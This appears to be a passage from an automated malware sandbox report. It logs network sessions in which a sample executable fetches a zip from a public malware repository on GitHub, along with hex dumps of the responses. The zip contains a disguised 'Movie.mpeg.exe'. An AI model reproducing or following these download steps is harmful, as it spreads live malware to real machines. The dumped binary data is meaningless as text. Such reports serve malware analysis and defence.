                                                                                                                                                2022-09-29 12:51:43 UTC17025INData Raw: 9a 88 af 7e 9b 7c e9 0a a4 36 da 4f e2 38 ee b9 ec 56 57 2a 41 77 92 8a 2f d7 4d 05 ab 52 3e a5 64 fd 06 48 82 c4 24 25 b8 69 34 5c 66 7c 2b 87 c9 a3 39 98 4a 3a 8a 8e ca 47 e9 c4 3f 14 94 00 63 35 f9 9f 59 c2 b3 23 e2 a4 b9 bb 9c bc d3 1d ab 58 f9 be a2 7c d6 69 cb b7 b5 92 56 f8 8f f5 2a 90 bd 97 d6 4f 29 a1 4a 52 83 9b a4 7f d0 6f 7e e1 6c 80 48 88 eb 1d 13 17 cb 00 9d c2 90 a5 80 43 aa b5 08 89 bc ac fc d2 43 27 d9 7e 9d 03 3f 50 af 8d b8 14 b7 8e e3 09 d5 e0 95 2d ba 82 9d bb 5c 4f ba c8 7c f4 c6 80 ec 21 b0 d8 3d 7a dc 63 ad cd b8 42 a7 1b 8a 58 77 aa 53 6f 4d 4d 5d 60 b9 c8 8d bf c5 79 51 4f ba 9f 96 3e db 27 eb 76 d5 d0 95 98 33 53 39 37 a3 91 cd 15 8e d2 cc 27 aa d7 d5 30 c8 28 95 e2 e7 dc 1b 19 47 1b ae cf 23 94 86 98 7e b0 ce 3a 34 93 35 66 99
                                                                                                                                                Data Ascii: ~|6O8VW*Aw/MR>dH$%i4\f|+9J:G?c5Y#X|iV*O)JRo~lHCC'~?P-\O|!=zcBXwSoMM]`yQO>'v3S97'0(G#~:45f


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                44192.168.2.549744140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:43 UTC17035OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:44 UTC17035INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:43 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:44 UTC17036INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                45192.168.2.549745185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:44 UTC17038OUTGET /Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:44 UTC17038INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 384539
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "0cab7a1b89e2af64986c2b84b88ccd44dcd6860b69b6ea218a864980f0359863"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0815:F707:9B622:135946:63359359
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:44 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6967-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455904.129589,VS0,VE251
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: f6c9afdd24b9304064dc60c73bd0b79bf9aed6fa
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:44 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:44 UTC17038INData Raw: 50 4b 03 04 33 00 01 00 63 00 c2 8c 4c 40 00 00 00 00 4d dd 05 00 00 7a 06 00 19 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 4d 6f 76 69 65 2e 6d 70 65 67 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 b6 8a 92 ee e8 62 ae fc e2 00 b1 2f 88 04 96 0a cc 4a 58 55 d5 86 04 2e e4 47 87 5d 38 0b 11 59 f2 ce 8f 3a b7 b8 de 3b c7 bb 1d 5d 19 64 c4 2a 7f d4 a2 f9 a6 98 b6 77 c9 81 c4 bc 63 64 a4 d4 36 39 45 fe 48 3b fa db 60 4c bc d2 c1 2c 9f c0 42 d1 88 ec f9 c7 0a ea 26 58 0d c4 06 ed 19 df 9e 04 73 b6 4b cf 54 95 95 dc cf 08 f9 f0 43 5f 26 e3 16 63 86 25 ec 9e 30 e5 5f 60 1c ec 61 1f cd 23 84 b7 af b8 60 b2 08 37 3a 9a 56 6d 06 6b 26 36 e9 ee 7c 24 c2 aa 51 32 53 43 61 68 5c 72 d5 5f 05 a8 01 5e 4c 0d 24 38 72 86 3a ba 72 a0 21 b5 c9 cf 1b ea 8b ed a1 67 90 6c 5d
                                                                                                                                                Data Ascii: PK3cL@MzEndermanch@Movie.mpeg.exeAEb/JXU.G]8Y:;]d*wcd69EH;`L,B&XsKTC_&c%0_`a#`7:Vmk&6|$Q2SCah\r_^L$8r:r!gl]
                                                                                                                                                2022-09-29 12:51:44 UTC17040INData Raw: 1c 68 f5 2f 1b 36 7c 6d 78 d5 52 fa 63 c2 b7 8e 28 79 4a 2c c2 e2 6b ce 4b a7 03 86 08 3c 35 1b 02 fc a1 39 87 66 69 f5 67 43 c0 99 d4 3d 94 d3 13 f9 09 f1 48 98 fa 92 3f 8c 6d 8c c1 df fc a1 73 12 2f ab 87 ce e1 e1 3b 85 90 ed f5 ed 67 67 7c e5 52 eb 9b f3 3c a9 64 df 91 ff bb 94 bc 59 28 0a 70 42 b2 26 90 9f c0 5a b4 64 7d 20 ee 38 9e c5 07 ba 8b 1a 87 7c 8f 5a a1 47 0e 6d 9b 2d 14 6d f8 67 d3 c5 0a 35 bf 55 59 c5 2b 07 31 c5 3b 78 e8 54 31 cd 4c fa dd 1d a3 fe ce 30 94 6c 5e b9 50 47 e6 dd 05 8d c6 8c 79 4c 01 7a e7 c5 91 e7 cf 97 12 5b 22 b9 83 42 98 4e e1 07 55 c7 e0 43 9e 1d c6 3d b9 f6 ef 58 39 c3 3f bc 5a 7d 28 f9 25 01 97 a8 fa fc 2f 22 3d ae e6 e2 fc db 71 47 db f6 9c e9 2d a8 2e 4c ff 9a 84 23 ef d4 47 4b 7d 31 41 6e f0 c0 58 d3 71 d1 e0 a1 51
                                                                                                                                                Data Ascii: h/6|mxRc(yJ,kK<59figC=H?ms/;gg|R<dY(pB&Zd} 8|ZGm-mg5UY+1;xT1L0l^PGyLz["BNUC=X9?Z}(%/"=qG-.L#GK}1AnXqQ
                                                                                                                                                2022-09-29 12:51:44 UTC17041INData Raw: 6d 45 dd 12 be 32 41 85 b5 70 10 12 5d 68 8e 19 d8 c6 ec 16 ea 75 6c 5b 3a 7e 2f c0 40 53 31 1f 39 76 51 59 13 74 66 24 73 7a 06 97 8b 83 25 97 02 8f 66 6c 39 ee c1 c1 de 2d 36 c6 20 65 1c bc 3a 4f 54 23 6e 3d 0e b7 c0 98 bb e7 85 c8 46 62 df 4f 20 c3 3e 3e f5 25 d6 1d 87 db 7b 4f 1b 87 b0 ae c1 f8 28 e1 25 36 69 95 5b 89 ac 2e 4f a4 98 c7 83 d2 36 3e 7b a8 58 ce f9 9e 76 b9 9f 55 f7 13 01 ff 8a fa ee 28 df 5a 7c bb 3f 79 b4 3d cc 52 0b e7 2a 2d f2 a4 40 6a 05 8b d5 cf f3 47 11 50 a3 9a 57 c9 80 76 43 d0 05 26 ce 5c 2a 01 6e 2d cd 5e 1f 0f e5 71 63 90 12 b7 e3 2e c5 98 9f fd fc 36 ee 2f 35 8c 6c 59 58 80 2b 48 1e 95 1a 53 5b 72 0e 45 73 c3 1e ad 35 b9 60 8d fb 25 8d e6 52 e3 fa d9 02 f8 61 dd 6d 39 c3 39 a4 2a 74 43 1a dc 96 ac 40 54 f9 4b ef 48 2f 2c 87
                                                                                                                                                Data Ascii: mE2Ap]hul[:~/@S19vQYtf$sz%fl9-6 e:OT#n=FbO >>%{O(%6i[.O6>{XvU(Z|?y=R*-@jGPWvC&\*n-^qc.6/5lYX+HS[rEs5`%Ram99*tC@TKH/,
                                                                                                                                                2022-09-29 12:51:44 UTC17042INData Raw: c5 fc 2c ca b4 3f c0 68 5f 7a 20 a9 91 c4 b0 8c ba 28 45 55 c6 7c 0c cb 00 52 3b a0 66 03 78 ed ae d8 56 75 82 77 6d 3f d6 29 2a 3e 23 c6 a2 d2 13 66 d8 61 fa 98 27 5f 59 71 b4 fc 0b f3 0e a2 b7 ef cc 04 85 26 cc ff 86 a2 d2 8a 36 a8 97 34 2a a2 16 ab c5 be 61 09 1c 40 9b 5d 57 5b 2d 26 12 eb c5 7b 02 ec 51 db eb d8 45 de 86 2b 06 b5 e7 af 24 6d e0 70 45 83 16 67 37 2a 01 c2 55 f0 dc a1 f8 5f 7d 2c 6c 21 2c d9 89 35 88 72 72 5e 98 da 0d 9b dc 87 6e 02 2f 63 00 2a 0e 52 77 83 cf e5 3e a5 43 26 92 28 9d 51 66 3c 0b ab 5c bb 57 06 89 34 81 aa bf 28 b4 7f 76 48 e9 25 a1 47 43 5b fa 68 7a 43 a0 72 68 2b ec 6f c9 f6 9f ae 0b 0e 86 1b 8d 39 ed 57 9a 65 6c e4 17 64 91 6f 0c d6 89 38 64 f0 ec 65 cb 1f cb e6 53 7c 07 70 69 96 31 a7 73 f7 6c d6 54 6b e2 eb 38 41 5f
                                                                                                                                                Data Ascii: ,?h_z (EU|R;fxVuwm?)*>#fa'_Yq&64*a@]W[-&{QE+$mpEg7*U_},l!,5rr^n/c*Rw>C&(Qf<\W4(vH%GC[hzCrh+o9Weldo8deS|pi1slTk8A_
                                                                                                                                                2022-09-29 12:51:44 UTC17044INData Raw: 9d f9 a8 bb 6b 2f 03 8a 0c 91 4d be bd 3c 6b 1f dd 15 0b 7c 13 aa f4 10 9c 51 a4 35 02 eb 76 27 10 e1 bd 17 3b 6d 69 64 27 e7 30 4c 01 9f e0 01 85 46 06 c3 2a 50 38 27 d4 9d d5 ea 9b 5e 66 38 dc e4 ec 78 9f 89 c0 9b 07 32 66 6e 9f 60 1a 67 08 69 e3 f6 7f 0d 02 0e 83 11 93 1d f4 82 78 94 87 45 d3 bf 80 57 19 a2 9b f9 8b 28 4f 67 31 a3 a4 6a 75 b8 66 eb eb 6b f3 22 6e 62 c1 e8 00 04 79 b4 6e 8c b1 e0 0a 89 f8 22 16 1c 31 8b 0b 43 95 a3 21 22 bc 98 50 50 bb 4f b0 c8 ce 65 77 7a 19 e6 93 0c 52 ea 41 4f 0c 7a a2 8a 0a d7 7c 05 d8 a5 8d bc 77 ce de d2 c3 fb b9 c4 f2 c9 2c 00 47 a0 37 37 bd 71 97 16 5b 65 d4 8b e5 e3 7c 82 50 c3 a5 86 31 35 15 a1 d8 6e ad 71 34 3d be f1 4e b5 0d b7 7b 5d f4 9d cf 2d 3c 9f 4c 0c 0c bd 75 35 6b 27 9f 82 35 2b 06 15 42 d2 5e ea 75
                                                                                                                                                Data Ascii: k/M<k|Q5v';mid'0LF*P8'^f8x2fn`gixEW(Og1jufk"nbyn"1C!"PPOewzRAOz|w,G77q[e|P15nq4=N{]-<Lu5k'5+B^u
                                                                                                                                                2022-09-29 12:51:44 UTC17045INData Raw: 30 3d 66 fb 2d eb 4f 87 80 69 ca 12 32 5e 3f ca 11 8c 65 bc 25 9c 90 fe 4b a5 c8 e3 b8 98 11 b0 69 88 20 bb 8a 94 e3 74 f7 e4 09 f1 ee b7 96 3d 1a d4 3e d9 4d 75 40 ae 37 f5 45 1c d5 c5 f4 a1 38 aa 9f 92 2c b8 9d fe f4 8e 1c 66 3b 66 e4 2b f6 0b dd a9 9a da a8 40 77 52 0d cd b8 b7 52 9b cb 7a 92 3b 3d 78 1a 36 06 5c cc 41 27 49 6c 59 66 3f be b9 1d 99 09 36 43 71 c4 aa 71 a3 22 34 40 50 22 08 3a 41 67 e0 42 72 4e 78 65 89 6a c6 76 db e0 8d 32 00 c1 2f db 7f a3 4d 34 73 8e d0 cd 0b 75 04 88 54 91 33 4f b7 ca 03 33 2d f7 1e db 3a df 22 7e 85 17 a0 41 88 01 5f 5e 67 86 ae 15 43 d1 4a 6b 27 71 3b 39 f2 9e 05 1a ff e8 0b 48 c5 3d 3a e9 6e 59 89 4e e6 05 3b a5 48 2f 61 6b fc 4c 9a 41 d1 1a ed ae 1e c1 b3 ef e9 38 09 e5 4e ca 20 9e 78 12 b9 1a 0e 19 71 78 4c 42
                                                                                                                                                Data Ascii: 0=f-Oi2^?e%Ki t=>Mu@7E8,f;f+@wRRz;=x6\A'IlYf?6Cqq"4@P":AgBrNxejv2/M4suT3O3-:"~A_^gCJk'q;9H=:nYN;H/akLA8N xqxLB
                                                                                                                                                2022-09-29 12:51:44 UTC17047INData Raw: a8 de 6e f2 96 d5 c7 17 0a 0a 8a f6 2b b0 7a f2 81 b9 f3 11 40 d7 1d 88 aa 45 e2 a0 63 8f 7c 8c 7a 68 76 e5 bb bc e4 4f e7 2b 8e 05 a8 08 05 1a 5e af 54 c9 88 bd 78 69 bb df 31 f0 41 4f ec 41 6c d7 bd 25 fe 1a f8 e1 96 df 9c f9 ac f3 b3 a1 0e 7d f3 d9 6a 73 9a b6 f3 82 3d 8f 94 67 d1 56 1d a9 dc 29 1f 64 bc 97 4d 6d 06 85 d3 e3 f4 be 76 5c 11 75 1a f8 c7 a4 15 54 11 b5 25 4a 7b e8 cc 66 f5 7f 97 b0 a1 3f 88 b2 72 4c ec b1 04 98 13 4c 36 b3 2d 3b cc d3 f4 14 4d 17 97 36 4f fb d8 7b 25 52 bf bb 05 d8 a9 18 68 4d 78 c1 d7 d2 b7 10 b4 76 1a 21 c3 fd 2b 9f 48 db 13 f6 a5 b6 48 34 a3 9e b7 ee a2 50 31 54 47 3b 86 c8 d7 c0 f2 0b 3a 82 2a e3 c1 6b a9 ef bd 9a 8f a2 70 db b5 e9 2c 21 34 e5 14 65 5f 2f ab 5c 1f 7f 8e 5f 85 4c 5e 2a c9 be 78 75 31 db 30 23 1e 68 69
                                                                                                                                                Data Ascii: n+z@Ec|zhvO+^Txi1AOAl%}js=gV)dMmv\uT%J{f?rLL6-;M6O{%RhMxv!+HH4P1TG;:*kp,!4e_/\_L^*xu10#hi
                                                                                                                                                2022-09-29 12:51:44 UTC17048INData Raw: 15 06 60 ef f5 03 b3 ae d6 70 a3 2c eb ae 2c 63 93 d9 77 3a 37 1a 32 6d 01 68 81 53 aa fd 56 f0 70 a9 b2 e7 20 4e 77 2e 81 e8 de 69 99 4a 36 31 03 25 da a0 68 04 07 65 bf 2d f5 bc d4 f8 3b 81 42 dd cd f6 86 17 98 47 89 cc 09 de f1 23 4b 25 24 d3 65 dc 91 41 5c c9 06 17 a8 a4 ee da 64 4d c7 1f 98 db 51 35 fd be cc da 0d 65 25 03 63 5e 75 ae 89 d3 0d ce d4 52 3f bc 7c 4f 4b 5a 39 52 db a4 f7 c6 69 c8 67 1b d4 2d 6e 20 6a 09 7c 70 46 3b c9 7c 53 26 2f fd 2f bc 22 88 1f e5 2e 7e 2f 1b 41 e4 d5 09 62 86 93 b1 f6 82 b1 ff aa 65 d1 c4 bf 30 d9 b4 d9 c8 47 af 38 a8 2c 48 03 bd f7 dc 13 a5 98 98 8e d7 46 95 6e 3b 2e 71 98 9b a2 47 0c be 75 4f 5b 48 5b f5 68 ae fe 08 53 ef 53 50 0a 50 1f 12 52 21 ed 42 f9 8b 3a 81 37 84 37 94 0b 53 97 31 62 44 6b dd 3f bb 17 51 77
                                                                                                                                                Data Ascii: `p,,cw:72mhSVp Nw.iJ61%he-;BG#K%$eA\dMQ5e%c^uR?|OKZ9Rig-n j|pF;|S&//".~/Abe0G8,HFn;.qGuO[H[hSSPPR!B:77S1bDk?Qw
                                                                                                                                                2022-09-29 12:51:44 UTC17049INData Raw: 4f c2 c0 0d 13 0c dc 97 52 2a f5 ba f3 85 3b a1 42 9a 35 85 b5 8b 94 53 12 9d 62 d7 e7 9d 43 50 48 f9 4a 01 11 d7 0c ad 85 9e ef 3f 15 94 7f f2 4d 71 eb 4b 6c fa 8a 67 ba a5 e4 52 7c a9 f2 59 38 82 c1 f4 60 dd 07 d3 97 7f 4d 98 ec 1c ce ad ff 39 8d af 38 84 3c 25 31 01 89 40 c5 35 48 05 e4 16 bd 33 84 57 de 44 fc 38 72 5d c4 5c 38 13 78 a8 64 96 14 d6 a1 c9 06 09 0e e3 e6 7a 8b eb 9c 4f a9 7e ca a1 98 35 06 2a 3c 16 5b 80 3e d9 a0 7a 3a 23 94 ad b2 c9 14 29 c4 b6 83 1d 86 b3 3d 87 6b 26 7b 7f 3c aa e2 41 38 bb 33 b3 d2 13 7a 7d af 61 7d 3f 56 7b 89 06 23 f8 54 f7 92 17 fa 3b 6a 9f 70 29 66 e5 a6 ae 4f 5c 8d 31 b6 dc cc 19 06 54 3b 43 ee a0 d0 80 5d 60 05 f7 3a cf 9e 94 ec d7 84 ec bc ad bc 89 8d 1b 6b bb 95 86 66 89 c3 31 45 fd f9 1a 99 d6 5b dc 05 e5 83
                                                                                                                                                Data Ascii: OR*;B5SbCPHJ?MqKlgR|Y8`M98<%1@5H3WD8r]\8xdzO~5*<[>z:#)=k&{<A83z}a}?V{#T;jp)fO\1T;C]`:kf1E[
                                                                                                                                                2022-09-29 12:51:44 UTC17051INData Raw: 42 e7 b6 f2 3b b9 f6 a3 75 fc d0 0a c9 12 25 36 b2 d2 47 86 a0 6f 31 88 a6 19 2d 44 ee ee d6 e2 9a ce 48 08 97 51 73 dc 33 10 8b 3e 51 c1 47 62 f0 7f 2c cb 94 73 70 ce 22 20 cf 85 3e 48 74 02 fb 2e 74 e6 03 2b cb ce 73 06 10 a2 4b b8 e6 20 96 4c 6c 90 b5 35 35 67 12 5b 8a 2a 05 e6 43 d5 e2 16 a7 77 e2 61 3e 6b 4d a4 f7 e8 a7 e6 5e c2 b8 29 20 1c 39 aa f6 9b a5 3c 9e 73 d7 36 3c cf 9d ce ab d0 b9 ca e7 1d 7f 79 c0 b3 fa 1f 41 d7 fa fb 46 86 29 9b a8 2b 61 0b 59 46 7a fa 6f 7b dc 3b c9 93 04 ff 17 c6 bf cc 69 c5 c1 a6 d7 3c 06 a7 8c ee 1e 41 80 fd 91 ff 30 10 dd 07 ea b7 3e 37 d3 96 f8 44 02 bf 2c bc 52 b2 c8 21 1b 9b 11 a4 eb 89 6c ca 65 f5 8b dd 97 63 cd d7 18 f6 a4 18 59 45 9b a3 52 fd 8f f9 92 0d 2e e8 9c b4 18 31 85 ba 96 c5 3f b2 00 f0 ad 55 41 7e 32
                                                                                                                                                Data Ascii: B;u%6Go1-DHQs3>QGb,sp" >Ht.t+sK Ll55g[*Cwa>kM^) 9<s6<yAF)+aYFzo{;i<A0>7D,R!lecYER.1?UA~2
                                                                                                                                                2022-09-29 12:51:44 UTC17052INData Raw: 4a 11 42 9a f5 5b 2a 8a 55 a8 16 ab dc 2c 0c a3 e6 a6 5c 58 4f 4e 62 af fa e3 e6 16 03 3a bf a5 2f 0e c8 3a a5 7e 2b a4 d7 5b 3a e4 ba 16 c8 14 e4 ca b8 b6 3a 77 6b 0b 4a 1c 7f c9 65 06 b8 1f ab 39 34 67 5f 88 7d 08 98 76 c3 26 75 08 b2 e2 89 cc e0 92 95 5b fa ec 17 48 22 83 45 65 aa 14 36 1e 58 7b 3b c7 6b 34 44 10 bc df e4 03 40 86 c3 24 be 1c af a2 e6 77 88 b3 23 fa af bf cd d1 1f 43 70 4d 35 21 0a 5e 08 ed cf 30 14 61 75 83 70 64 e5 cf e6 b2 2d a9 aa 42 78 c2 c3 21 2c 9b 1b 52 d1 4f dd a0 d1 7e 88 ae 26 83 5b ba cb c5 d9 73 35 d9 54 ea 57 8d 41 07 52 98 52 00 37 13 36 60 d9 13 2b 02 a8 44 55 d9 52 27 e9 47 fb 25 a6 32 d1 78 3c f8 6c a5 ea fb 92 06 57 cf 46 a1 1f 08 49 7f 7a 65 a3 16 cf 66 40 9f ef d9 07 18 e2 91 66 8f 08 14 57 72 16 47 19 9f d8 48 e6
                                                                                                                                                Data Ascii: JB[*U,\XONb:/:~+[::wkJe94g_}v&u[H"Ee6X{;k4D@$w#CpM5!^0aupd-Bx!,RO~&[s5TWARR76`+DUR'G%2x<lWFIzef@fWrGH
                                                                                                                                                2022-09-29 12:51:44 UTC17053INData Raw: 2c 4c 10 09 cd 1e 55 0f 94 40 cb e2 fe 17 4f 2b b1 b6 e4 d5 bc a4 68 36 ea 32 02 02 9f 75 27 c6 b5 94 ed 58 81 14 f4 77 72 7a d2 18 41 c5 ef 97 bf 54 09 83 f9 d2 91 30 aa a1 c7 d4 fb c4 7e ac e9 c3 19 6f 8a 8f 39 57 3a bd ca 30 d2 12 65 ff 56 f3 07 33 85 60 e1 59 61 36 27 36 f5 25 b9 43 9d 3a 44 35 0f a0 a3 d7 f9 78 1e 62 ce 38 46 69 a6 b3 b4 fb 8c 60 74 cf 4d 7a 1f 3c d7 c8 8f b6 0e 71 40 15 95 1d ea ed 76 1c 37 87 b2 26 e8 fc 1d d8 b1 90 c4 03 e5 72 08 f2 e3 f2 75 73 d5 3f 85 4d 75 96 5f cb 86 af c9 c2 04 6c 7b d7 54 a1 6e 1d b4 e1 53 9a 9a 5d d8 ca 74 0b 87 f7 24 9f 02 cf 0a 66 ca 71 f8 ca ef 0d db 47 65 6c 0b 82 4e 41 bb 04 88 29 cb 52 57 5a a4 03 53 8c 9f 11 c2 9c ef 2b 64 93 e7 50 ef d9 d2 0e c9 0f c6 01 44 33 16 79 5e d5 74 b8 b2 ec 9a 27 21 42 fc
                                                                                                                                                Data Ascii: ,LU@O+h62u'XwrzAT0~o9W:0eV3`Ya6'6%C:D5xb8Fi`tMz<q@v7&rus?Mu_l{TnS]t$fqGelNA)RWZS+dPD3y^t'!B
                                                                                                                                                2022-09-29 12:51:44 UTC17054INData Raw: bd 44 3b dd 8b 1a 92 69 97 01 96 b4 42 23 a4 8e 16 d5 fd 70 fe 6b 78 27 49 69 9a 8e aa 7f 2e 84 9d 3d f5 dd 9c f2 70 6f 86 8e 2c fe a5 70 ab ad 03 f6 7d 8c d4 61 79 d8 0e 9c 21 a4 5a 85 dc ad d4 c9 a4 d7 51 ed 69 e1 f4 94 55 60 ea 39 cd 3a fe 31 84 39 8c 51 40 04 03 41 6e 74 cc fa 70 f2 5f 12 a6 6f 5f b8 4f 8a 83 21 0b 04 1f 68 0d 40 be 8e c9 d4 ef 47 3a af 77 6a cf 09 5a 5c 53 9e 52 f6 5d f0 45 e1 f1 2b 78 6b e7 f3 55 e5 ba 70 d9 5d 6a 3f 28 a4 b7 c3 28 2f e1 96 ce a0 de dc af ca ea 2f f0 a1 6a 51 b2 1d 99 a1 5e 51 97 88 33 7d 24 1d a2 bf 2f 64 8d d6 9e cd 46 b2 03 5c be 64 15 3a 9a 46 94 be 10 69 3f 84 eb c3 2c b1 f4 6f 89 42 7d da 22 c2 95 68 f4 cd 3d 55 54 0b d9 67 b4 bf 43 9a ca d6 d7 7f 53 a0 05 de 72 60 5f 75 0c 1d c4 d3 3c 15 a0 bc 4e 1b 55 b1 47
                                                                                                                                                Data Ascii: D;iB#pkx'Ii.=po,p}ay!ZQiU`9:19Q@Antp_o_O!h@G:wjZ\SR]E+xkUp]j?((//jQ^Q3}$/dF\d:Fi?,oB}"h=UTgCSr`_u<NUG
                                                                                                                                                2022-09-29 12:51:44 UTC17070INData Raw: e1 9f d9 64 f1 fd e9 64 e5 9e a8 76 93 45 a1 e0 24 40 f4 5e 5f 36 ac 9b 8c 99 50 05 e3 45 56 0c 02 60 b9 87 68 92 92 e6 47 03 50 07 40 2e 73 b3 41 6d 94 ce 9b b3 29 76 26 21 37 f5 3c e4 e9 29 67 42 d2 13 ba 46 fe 48 66 e6 08 de c6 0a 40 52 4e 36 44 02 29 f9 f7 0c 9b 8e ca de f3 fc 83 b5 ba 69 85 d8 87 ef 5b 21 19 7a 60 8c c1 ca dd c5 1c c8 e7 fa 9a 67 7e ad 00 9e ee 1e 78 69 e0 9a f1 b2 6b 02 e4 86 85 b5 b1 47 e4 c4 66 1e a3 3d 9b 51 33 12 5f 65 d6 ff af b9 88 31 b3 5b f8 37 d8 9e 45 b7 05 41 6e c3 19 27 1a 72 0d 8a 0b e0 02 c4 87 54 1a 2d d3 50 a7 f3 30 a9 10 23 40 62 7f 7e d4 3f 9c 50 a5 b6 55 9d f2 69 69 91 e2 25 a9 87 ff d3 23 36 8a 02 0b e0 24 5b f7 28 9c 73 b7 0d 51 fc d7 9e 61 3f e7 a5 46 fa 6b 85 b2 11 38 59 13 45 91 57 0f 49 49 12 cd c3 a2 3b 8f
                                                                                                                                                Data Ascii: ddvE$@^_6PEV`hGP@.sAm)v&!7<)gBFHf@RN6D)i[!z`g~xikGf=Q3_e1[7EAn'rT-P0#@b~?PUii%#6$[(sQa?Fk8YEWII;
                                                                                                                                                2022-09-29 12:51:44 UTC17086INData Raw: da 35 1f a9 e6 d4 7e 94 1f 0d 01 79 2c 44 10 61 cf 23 8e 41 2a 57 0e ae ff 64 51 db 9f 25 34 a3 c4 af 22 91 e5 b8 b1 7c ce b3 74 43 67 4b 21 14 99 f3 53 a5 fa 1c 57 cf da bb 43 dd 41 03 b2 35 56 33 64 ba 58 5b 14 5c 91 20 4f 0d bd bf e9 c2 00 1c c5 53 f9 62 eb 96 27 50 5a ff d1 f8 07 9c 92 40 a5 ee 2b 23 73 7e da ee 8b 1a b9 8f d2 44 11 08 21 39 0a 84 e2 c3 9d d9 12 e0 41 56 03 d8 96 41 6e fb ca 83 66 7b fa 99 49 de 2c 4f 31 52 27 64 5c f3 45 f2 a3 d7 aa 8c 3c 49 0f 2d 51 a2 98 3c 51 f8 3d e2 a6 c6 28 37 98 84 da a2 52 6c 12 da 0e dd 4d e7 f4 38 d4 98 80 96 35 8b d3 b7 8f 73 53 8e 80 54 5c a0 85 36 48 3c dc 8b 91 8d ad 7c 1c 6b 97 20 e0 68 24 e9 a8 e7 de 31 72 83 f6 e1 28 0f 48 a7 55 27 33 8d f7 7c 5c 90 cb 28 63 01 39 3e 67 be 95 73 b3 73 6a cb 4f 62 70
                                                                                                                                                Data Ascii: 5~y,Da#A*WdQ%4"|tCgK!SWCA5V3dX[\ OSb'PZ@+#s~D!9AVAnf{I,O1R'd\E<I-Q<Q=(7RlM85sST\6H<|k h$1r(HU'3|\(c9>gssjObp
